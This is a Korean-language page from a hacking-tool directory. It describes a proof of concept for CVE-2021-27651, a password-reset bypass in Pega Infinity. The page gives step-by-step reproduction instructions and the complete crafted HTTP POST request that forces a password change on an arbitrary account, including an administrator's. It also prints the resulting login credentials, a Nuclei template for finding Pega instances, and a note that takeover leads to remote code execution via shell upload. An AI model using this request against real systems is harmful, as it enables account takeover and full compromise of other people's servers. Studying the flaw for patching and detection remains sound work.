Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-27651 — 비밀번호 재설정 절차의 모든 단계를 우회 | Kitploit
도구/GitHubGitHub/orangmuda/cve-2021-27651
Password AttacksCode AnalysisExploitationWeb Application ExploitationAuthenticationRemote Access Tool
GitHuborangmuda/cve-2021-27651

CVE-2021-27651

비밀번호 재설정 절차의 모든 단계를 우회

저장소 보기
114년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

요약

공격자는 비밀번호 재설정 흐름의 모든 단계를 우회하고 Pega Infinity에서 임의 사용자의 계정을 재설정할 수 있습니다. 이는 (1) 비밀번호 재설정 흐름을 시작하고 피해자의 이메일을 입력한 다음, (2) HTTP POST 요청이 통과하도록 강제하여 비밀번호를 업데이트하는 방식으로 이루어집니다. 공격자는 새로 변경된 계정으로 로그인한 후, 허용되는 다양한 인증 후 코드 실행 벡터(동적 페이지 수정, 템플릿 등)를 통해 Pega 인스턴스를 완전히 장악할 수 있습니다.

재현 단계

  1. 아무 Pega 인스턴스의 로그인 페이지로 이동합니다.
  2. "reset password"를 클릭합니다.
  3. "[email protected]"을 입력하고, HTTP 요청을 프록시로 캡처한 다음, "[email protected]"이 포함된 HTTP 요청을 Burp Repeater 탭이나 유사한 탭으로 보냅니다. 그런 다음 프록시를 비활성화하거나 "send"를 클릭하여 요청이 통과하도록 허용합니다.
  4. 초기 요청이 통과하도록 허용한 후, Repeater에서 HTTP 요청 본문을 수정하여 다음 데이터를 포함시킵니다...
root@kitploit:~
POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1 (:PEGA_ID is a unique ID for each site, it is in this format: ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W)
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com
DNT: 1
Connection: close
Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
Cookie: yourCookie
Upgrade-Insecure-Requests: 1

pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
  1. HTTP 요청을 전송한 후, 비밀번호 재설정의 확인 단계를 우회하고 관리자 계정으로 로그인할 수 있게 된 상태에서 다음 자격 증명으로 로그인합니다...
root@kitploit:~
[email protected] / Rules@1234
  1. 그런 다음, 허용되는 다양한 관리자 전용 코드 실행 벡터를 통해 RCE를 달성할 수 있습니다.

영향을 받는 버전

Pega Infinity >= 8.2.1 Pega Infinity <= 8.5.2

영향

사전 지식 없이 모든 Pega 인스턴스를 완전히 장악할 수 있습니다.

관련 이미지

비밀번호 우회

  • 비밀번호 우회

셸 업로드를 통한 원격 코드 실행

  • 셸 업로드를 통한 원격 코드 실행

Nuclei 템플릿

root@kitploit:~
id: pega

info:
  name: Pega Infinity Login
  author: sshell
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Pega API"

제보자

Andri Wijayanti (@andridev_),

도구 다운로드